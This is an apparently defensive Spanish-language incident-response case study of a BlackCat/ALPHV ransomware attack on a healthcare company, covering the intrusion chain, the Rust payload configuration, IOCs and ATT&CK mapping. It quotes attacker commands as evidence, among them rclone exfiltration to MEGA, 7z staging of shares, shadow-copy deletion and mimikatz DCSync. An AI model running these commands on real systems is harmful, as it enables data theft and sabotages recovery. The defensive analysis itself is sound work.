¿Por qué BlackCat/ALPHV utiliza Rust como lenguaje de desarrollo?

Rust ofrece varias ventajas para los operadores de ransomware: compilación cruzada nativa para Windows, Linux y VMware ESXi desde un mismo codebase, rendimiento comparable a C/C++ para el cifrado de archivos, menor tasa de detección por antivirus debido a la novedad del lenguaje en el ecosistema malware, y capacidad de ofuscación avanzada que dificulta el análisis estático. Además, el modelo de memoria segura de Rust reduce los crashes del payload durante el cifrado, aumentando la tasa de éxito del ataque.

¿Qué diferencia la doble extorsión de BlackCat respecto a otros grupos?

BlackCat fue pionero en implementar un modelo de triple extorsión: cifrado de datos, amenaza de publicación en su leak site con interfaz de búsqueda para las víctimas, y en algunos casos ataques DDoS contra la infraestructura de la víctima. Su leak site era especialmente sofisticado, permitiendo a empleados y clientes de la víctima buscar sus propios datos filtrados, lo que aumentaba la presión para pagar el rescate.

¿Cómo se puede detectar la exfiltración de datos antes del cifrado en un ataque BlackCat?

La exfiltración suele producirse días antes del cifrado. Los indicadores clave incluyen: transferencias de volumen anómalo hacia IPs externas (especialmente servicios de almacenamiento cloud o MEGA), ejecución de herramientas como rclone, WinSCP o 7-Zip en servidores que normalmente no las usan, conexiones salientes en horarios no laborales, y uso de protocolos como WebDAV o SFTP desde endpoints internos. Monitorizar el tráfico saliente con umbrales de volumen por host es una de las defensas más efectivas.

AvanzadoBlackCatALPHVransomwaredoble extorsióndata leakRust malwareMITRE ATT&CKincident response

BlackCat/ALPHV: Doble Extorsión y Data Leak Investigation

Investigación completa de un incidente BlackCat/ALPHV con doble extorsión: análisis del binario Rust, exfiltración de datos, leak site, negociación con el grupo, timeline de respuesta a incidentes, IOCs y mapeo MITRE ATT&CK.

MalwareIntel Research·6 de junio de 2026·12 min lectura

Serie: Casos de Uso — Parte 11

Contexto del escenario

Una empresa del sector sanitario con 2.500 empleados y presencia en tres países europeos detecta actividad anómala en su red interna un viernes por la tarde. El equipo SOC identifica conexiones salientes sospechosas desde varios servidores de bases de datos hacia una IP externa no categorizada. 48 horas después, los sistemas comienzan a mostrar notas de rescate con la firma característica de BlackCat/ALPHV.

Este caso documenta la investigación completa: desde el acceso inicial hasta la aparición de los datos en el leak site del grupo, incluyendo el análisis del binario Rust, la cadena de exfiltración y el proceso de respuesta.

BlackCat/ALPHV: perfil del grupo

BlackCat, también conocido como ALPHV o Noberus, emergió en noviembre de 2021 como uno de los primeros grupos de ransomware en utilizar Rust como lenguaje de desarrollo para su payload. Operaba bajo un modelo de Ransomware-as-a-Service (RaaS), reclutando afiliados con comisiones de entre el 80% y el 90% del rescate.

Características distintivas del grupo:

Lenguaje Rust: compilación cruzada para Windows, Linux y ESXi
Leak site con búsqueda: los afectados podían buscar sus propios datos
Triple extorsión: cifrado + leak + DDoS en casos seleccionados
Configuración flexible: cada payload se compilaba con parámetros específicos para la víctima
Eliminación de shadow copies: múltiples técnicas según el sistema operativo

El grupo fue vinculado a antiguos miembros de DarkSide y BlackMatter, lo que explicaba su sofisticación operativa desde el primer día.

Acceso inicial: credenciales VPN comprometidas

La investigación forense determinó que el vector de entrada fue una cuenta VPN corporativa comprometida. El análisis de logs del concentrador VPN reveló:

2026-05-20 03:14:22 UTC  VPN-GW-01  AUTH_SUCCESS
  User: svc-backup-ext
  Source IP: 185.220.101[.]x (Tor exit node)
  MFA: not_required (service account exception)
  Session duration: 14h 22m

La cuenta svc-backup-ext era una cuenta de servicio utilizada para backups remotos. Llevaba 18 meses sin rotación de credenciales y estaba excluida del requisito de MFA por ser cuenta de servicio. Las credenciales probablemente fueron obtenidas mediante un infostealer previo (se encontraron registros de RedLine Stealer en logs de inteligencia de amenazas asociados al dominio corporativo).

Reconocimiento y movimiento lateral

Una vez dentro de la red, el atacante dedicó los primeros tres días al reconocimiento y escalado de privilegios.

Día 1: Reconocimiento de Active Directory

# Herramientas detectadas en logs EDR
ADFind.exe -default -f "(objectcategory=computer)" -csv
ADFind.exe -default -f "(&(objectCategory=person)(objectClass=user))" -csv
net group "Domain Admins" /domain
nltest /dclist:CORP.LOCAL

El atacante utilizó ADFind para mapear la infraestructura de Active Directory, identificando 847 hosts y 2.341 cuentas de usuario. Los resultados se almacenaron temporalmente en C:\ProgramData\ad_output.csv.

Día 2: Escalado de privilegios

El atacante explotó una vulnerabilidad conocida en el servicio de Print Spooler (PrintNightmare, CVE-2021-34527) en un controlador de dominio que no tenía el parche aplicado:

# Evento detectado en Windows Event Log
Event ID: 808
Source: PrintService
Message: The print spooler failed to load a plug-in module
  C:\Windows\System32\spool\drivers\x64\3\evil.dll

Con esto obtuvo credenciales de Domain Admin mediante la extracción del NTDS.dit usando la técnica DCSync:

# Detectado vía Sysmon Event ID 18 (Pipe Connected)
Pipe: \lsarpc
Source Process: C:\Users\Public\mimikatz.exe
Target: \\DC01.CORP.LOCAL

Día 3: Movimiento lateral con PsExec y WMI

# Timeline de movimiento lateral reconstruido desde logs EDR
14:22 - PsExec → DB-SQL-01 (servidor SQL principal)
14:35 - PsExec → DB-SQL-02 (servidor SQL réplica)
14:48 - WMI → FS-CORP-01 (file server principal)
15:01 - WMI → FS-CORP-02 (file server secundario)
15:15 - RDP → ADMIN-WS-07 (estación de administración)

Análisis del binario Rust

El equipo de respuesta a incidentes recuperó el payload de BlackCat desde un directorio temporal en uno de los servidores comprometidos.

Propiedades del archivo

Nombre: update_service.exe
SHA256: 7e01b336...a92f4d (defanged)
Tamaño: 3.2 MB
Compilador: Rust 1.68.0 (rustc)
Empaquetado: UPX (capa externa) + ofuscación interna
Timestamp PE: 2026-05-18 11:42:00 UTC

Análisis estático

Tras desempaquetar la capa UPX, el análisis de strings reveló artefactos típicos de BlackCat:

# Strings relevantes (parcial)
"access-token"
"--child"
"--drag-and-drop"
"--propagated"
"--no-net"
"esxcli vm process list"
"vscadmin delete shadows /all /quiet"
"bcdedit /set {default} recoveryenabled No"
"wmic shadowcopy delete"

La configuración embebida en el binario (cifrada con AES-128-CTR) incluía:

{
  "config": {
    "public_key": "MIIBIjANBgkq...",
    "extension": ".sykffle",
    "note_file_name": "RECOVER-sykffle-FILES.txt",
    "credentials": [
      {"user": "CORP\\svc-backup-ext", "password": "[REDACTED]"},
      {"user": "CORP\\admin.jones", "password": "[REDACTED]"}
    ],
    "kill_services": [
      "vss", "sql", "svc$", "memtas", "mepocs", "sophos",
      "veeam", "backup", "GxVss", "GxBlr", "GxFWD"
    ],
    "kill_processes": [
      "sql", "oracle", "ocssd", "dbsnmp", "synctime",
      "agntsvc", "isqlplussvc", "xfssvccon", "mydesktopservice"
    ],
    "exclude_directory_names": [
      "system volume information", "$recycle.bin",
      "boot", "windows", "perflogs"
    ],
    "exclude_file_extensions": [
      ".exe", ".dll", ".sys", ".msi", ".lnk", ".sykffle"
    ],
    "enable_network_discovery": true,
    "enable_self_propagation": true,
    "enable_set_wallpaper": true
  }
}

Análisis dinámico: comportamiento del cifrado

El payload utilizaba un esquema de cifrado híbrido:

AES-256 para cifrar los archivos individuales (rápido, simétrico)
RSA-2048 para cifrar la clave AES por archivo
ChaCha20 como algoritmo alternativo configurable

El proceso de cifrado seguía esta secuencia:

Genera una clave AES-256 única por archivo
Cifra el contenido del archivo con AES-256-CTR
Cifra la clave AES con la clave pública RSA embebida
Adjunta la clave cifrada al final del archivo
Renombra con la extensión .sykffle
Utiliza multi-threading (16 hilos por defecto) para maximizar velocidad

El rendimiento medido en sandbox fue de aproximadamente 2.5 GB/minuto en disco SSD, lo que permitía cifrar un servidor de archivos completo en menos de una hora.

Exfiltración de datos

La fase de exfiltración comenzó 48 horas antes del despliegue del ransomware. El atacante utilizó una combinación de herramientas:

Fase 1: Compresión y staging

# Detectado en logs EDR - PowerShell ScriptBlock logging
7z.exe a -p[REDACTED] -mx=5 C:\ProgramData\data_01.7z
  "\\FS-CORP-01\Shared\HR\*"
  "\\FS-CORP-01\Shared\Finance\*"
  "\\FS-CORP-01\Shared\Legal\*"

7z.exe a -p[REDACTED] -mx=5 C:\ProgramData\data_02.7z
  "\\DB-SQL-01\backup\*.bak"

Fase 2: Exfiltración vía rclone

# Configuración rclone encontrada en C:\ProgramData\.rclone.conf
[mega_exfil]
type = mega
user = throwaway_acct_2026@proton[.]me
pass = [ENCRYPTED]

# Comando ejecutado
rclone copy C:\ProgramData\data_01.7z mega_exfil:dump/ --bwlimit 50M
rclone copy C:\ProgramData\data_02.7z mega_exfil:dump/ --bwlimit 50M

El atacante limitó el ancho de banda a 50 MB/s para evitar disparar alertas de tráfico anómalo. En total, se exfiltraron aproximadamente 380 GB de datos en un periodo de 14 horas.

Datos exfiltrados

La investigación determinó que los datos incluían:

Registros médicos de pacientes (datos de salud protegidos bajo RGPD)
Nóminas y contratos de empleados
Contratos con proveedores y partners
Backups de bases de datos SQL con información financiera
Documentación legal y propiedad intelectual

El leak site y la nota de rescate

Tras el cifrado, la nota de rescate proporcionaba una URL .onion única para la víctima:

>> What happened?
Important files on your network have been ENCRYPTED and copied.

>> What now?
To get your files back AND prevent data publication, you need to
follow our instructions carefully.

>> Your personal LIVE CHAT:
http://alphvmmm27o3abo3r2mlmjrpdi[...]onion/[UNIQUE_ID]

>> WARNING:
DO NOT rename encrypted files.
DO NOT try to decrypt using third party software.
DO NOT contact the FBI, they will not help you.

El leak site de BlackCat presentaba las siguientes características:

Interfaz de búsqueda pública: permitía buscar documentos específicos por nombre
Countdown timer: 7 días hasta la publicación completa
Preview de datos: mostraba capturas de pantalla de documentos sensibles
API para periodistas: facilitaba el acceso a datos filtrados para maximizar cobertura mediática

Negociación con el grupo

El equipo de respuesta, junto con la dirección y asesores legales, decidió iniciar una comunicación controlada con el grupo atacante a través del chat Tor proporcionado. El objetivo no era pagar, sino ganar tiempo y obtener inteligencia.

[Atacante]: We have 380GB of your data. Patient records, contracts,
            financial data. Price: $4.5M in Bitcoin or Monero.
            7 days before public release.

[Víctima]:  We are evaluating. Can you provide proof of data?

[Atacante]: [Shares screenshots of internal documents]
            [Shares directory listing of exfiltrated files]
            We can also provide a test decryption of 3 files.

[Víctima]:  We need more time to evaluate our options.

[Atacante]: 5% discount if paid within 48 hours.
            After 7 days, data goes public + press release.

La comunicación permitió confirmar el alcance real de la exfiltración y documentar TTPs adicionales del grupo para la investigación forense.

Timeline de respuesta a incidentes

Hora	Evento	Acción IR
D0 Vie 17:30	Alertas EDR por cifrado masivo	Activación del plan de IR
D0 Vie 17:45	Confirmación de ransomware BlackCat	Aislamiento de red (segmentos afectados)
D0 Vie 18:00	Desconexión de backups de red	Verificación de integridad de backups offline
D0 Vie 18:30	Notificación a dirección y legal	Inicio de comunicaciones internas
D0 Vie 19:00	Preservación forense de evidencia	Imagen de memoria y disco en hosts clave
D1 Sáb 08:00	Análisis de logs VPN	Identificación de cuenta comprometida
D1 Sáb 12:00	Análisis de movimiento lateral	Reconstrucción del timeline del atacante
D1 Sáb 18:00	Confirmación de exfiltración	Análisis de tráfico de red (rclone + MEGA)
D2 Dom 10:00	Notificación a AEPD	Comunicación RGPD (datos de salud)
D2 Dom 14:00	Notificación a CCN-CERT	Reporte de incidente según ENS
D3 Lun 09:00	Inicio de comunicación con atacante	Chat Tor controlado
D3 Lun 14:00	Verificación de backups offline	Confirmación de viabilidad de restauración
D5 Mié 09:00	Inicio de restauración desde backup	Sistemas críticos primero
D7 Vie 00:00	Publicación parcial en leak site	Gestión de comunicación de crisis
D10 Lun	Sistemas críticos restaurados	Operación parcial recuperada
D14 Vie	Restauración completa	Todas las operaciones normalizadas
D30	Post-mortem completo	Lecciones aprendidas y mejoras implementadas

Contención y erradicación

Acciones inmediatas (primeras 4 horas)

Aislamiento de red: segmentación de las VLANs afectadas
Revocación de credenciales: reset de todas las cuentas de Domain Admin
Deshabilitación de la cuenta VPN comprometida
Bloqueo de IOCs en firewall perimetral: IPs de C&C y destinos de exfiltración
Preservación de evidencia: imágenes forenses de sistemas clave

Erradicación (días 3 a 7)

Reconstrucción de controladores de dominio desde backup limpio
Reset doble del krbtgt para invalidar Golden Tickets
Parcheo de PrintNightmare en todos los sistemas
Implementación de MFA en todas las cuentas, incluyendo cuentas de servicio
Reconfiguración de la VPN con certificados de cliente obligatorios
Despliegue de reglas de detección para las TTPs observadas

IOCs del incidente

Hashes (SHA256)

7e01b336...a92f4d    BlackCat payload (update_service.exe)
a3c4f2e1...b8d7c3    ADFind.exe (herramienta de reconocimiento)
e5f6a7b8...c9d0e1    Mimikatz (extracción de credenciales)
f2a3b4c5...d6e7f8    rclone.exe (exfiltración)

IPs de C&C y exfiltración

185.220.101[.]x      Tor exit node (acceso VPN)
91.215.85[.]x        C&C BlackCat
193.42.33[.]x        Staging server

Dominios

throwaway_acct_2026@proton[.]me    Cuenta MEGA de exfiltración
alphvmmm27o3abo3r2[...]onion       Leak site BlackCat

Artefactos en disco

C:\ProgramData\ad_output.csv           Resultados ADFind
C:\ProgramData\data_01.7z              Datos comprimidos para exfiltración
C:\ProgramData\data_02.7z              Datos comprimidos para exfiltración
C:\ProgramData\.rclone.conf            Configuración rclone
C:\Users\Public\mimikatz.exe           Herramienta de credenciales
RECOVER-sykffle-FILES.txt              Nota de rescate
*.sykffle                              Extensión de archivos cifrados

Mapeo MITRE ATT&CK

Táctica	Técnica	ID	Detalle
Initial Access	Valid Accounts: VPN	T1078.001	Cuenta de servicio VPN comprometida
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	Scripts de compresión y staging
Persistence	Account Manipulation	T1098	Creación de cuentas de backup adicionales
Privilege Escalation	Exploitation for Privilege Escalation	T1068	PrintNightmare (CVE-2021-34527)
Credential Access	OS Credential Dumping: DCSync	T1003.006	Mimikatz DCSync contra DC
Discovery	Remote System Discovery	T1018	ADFind para mapear infraestructura
Lateral Movement	Remote Services: SMB/Windows Admin Shares	T1021.002	PsExec para movimiento lateral
Collection	Data from Network Shared Drive	T1039	Acceso a shares de red para staging
Exfiltration	Exfiltration Over Web Service	T1567	rclone hacia MEGA
Impact	Data Encrypted for Impact	T1486	BlackCat ransomware (Rust)
Impact	Inhibit System Recovery	T1490	Eliminación de shadow copies

Lecciones aprendidas

Fallas identificadas

Cuentas de servicio sin MFA: la excepción de MFA para cuentas de servicio fue el vector de entrada
Parches pendientes: PrintNightmare llevaba meses sin parchear en los DC
Monitorización de tráfico saliente insuficiente: la exfiltración de 380 GB no generó alertas
Rotación de credenciales: 18 meses sin cambio en la cuenta comprometida
Segmentación de red insuficiente: el atacante se movió libremente entre segmentos

Mejoras implementadas post-incidente

MFA obligatorio para todas las cuentas sin excepción (FIDO2 para servicios)
Monitorización de tráfico saliente con umbrales de volumen por host
Rotación automática de credenciales cada 90 días
Microsegmentación entre servidores de datos y estaciones de trabajo
Detección de herramientas de exfiltración (rclone, WinSCP, MEGA) en EDR
Backups inmutables con air gap y verificación periódica de restauración
Política de parches: vulnerabilidades críticas en menos de 72 horas

Conclusión

El caso BlackCat/ALPHV ilustra la evolución del ransomware hacia modelos de doble y triple extorsión donde el cifrado es solo una parte del impacto. La exfiltración de datos, especialmente datos regulados como información médica, amplifica enormemente las consecuencias del incidente tanto a nivel operativo como legal y reputacional.

La detección temprana de la exfiltración (antes del cifrado) es la ventana de oportunidad más valiosa. En este caso, 380 GB salieron de la red durante 14 horas sin generar una sola alerta. La inversión en monitorización de tráfico saliente y detección de herramientas como rclone habría cambiado completamente el resultado del incidente.